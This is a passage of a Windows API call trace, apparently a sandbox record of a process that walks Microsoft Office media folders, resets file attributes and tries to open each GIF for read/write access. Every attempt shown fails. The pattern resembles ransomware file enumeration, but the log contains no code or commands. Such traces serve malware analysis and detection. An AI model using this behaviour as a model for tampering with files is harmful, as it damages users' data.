0x350000 [0135.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF", dwFileAttributes=0x80) returned 0 [0135.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10219_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.957] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.957] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.957] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF", dwFileAttributes=0x80) returned 0 [0135.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10256_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.957] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.957] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.957] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF", dwFileAttributes=0x80) returned 0 [0135.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10289_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.958] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.958] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF", dwFileAttributes=0x80) returned 0 [0135.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10290_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.959] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.959] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.959] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF", dwFileAttributes=0x80) returned 0 [0135.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10307_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.960] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.960] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF", dwFileAttributes=0x80) returned 0 [0135.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10308_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.960] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.960] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.960] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF", dwFileAttributes=0x80) returned 0 [0135.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10358_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.961] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.961] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.961] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.961] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF", dwFileAttributes=0x80) returned 0 [0135.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14516_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.962] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.962] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF", dwFileAttributes=0x80) returned 0 [0135.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14538_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.963] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF", dwFileAttributes=0x80) returned 0 [0135.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14539_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.963] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.963] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF", dwFileAttributes=0x80) returned 0 [0135.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14594_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.964] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF", dwFileAttributes=0x80) returned 0 [0135.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14595_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.964] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF", dwFileAttributes=0x80) returned 0 [0135.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14677_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.965] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF", dwFileAttributes=0x80) returned 0 [0135.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14710_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.965] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF", dwFileAttributes=0x80) returned 0 [0135.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14711_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.966] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF", dwFileAttributes=0x80) returned 0 [0135.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14768_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.967] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF", dwFileAttributes=0x80) returned 0 [0135.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14769_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.967] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF", dwFileAttributes=0x80) returned 0 [0135.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14800_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.968] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.968] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF", dwFileAttributes=0x80) returned 0 [0135.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14801_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.968] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.968] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF", dwFileAttributes=0x80) returned 0 [0135.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14844_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14844_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.969] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF", dwFileAttributes=0x80) returned 0 [0135.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14845_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14845_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.969] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF", dwFileAttributes=0x80) returned 0 [0135.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14882_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.970] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF", dwFileAttributes=0x80) returned 0 [0135.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14883_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.971] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF", dwFileAttributes=0x80) returned 0 [0135.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14996_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.971] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF", dwFileAttributes=0x80) returned 0 [0135.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14997_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.972] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF", dwFileAttributes=0x80) returned 0 [0135.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15034_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.972] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF", dwFileAttributes=0x80) returned 0 [0135.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15035_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.973] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF", dwFileAttributes=0x80) returned 0 [0135.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15072_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15072_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.973] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF", dwFileAttributes=0x80) returned 0 [0135.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15073_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15073_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.974] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.974] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, 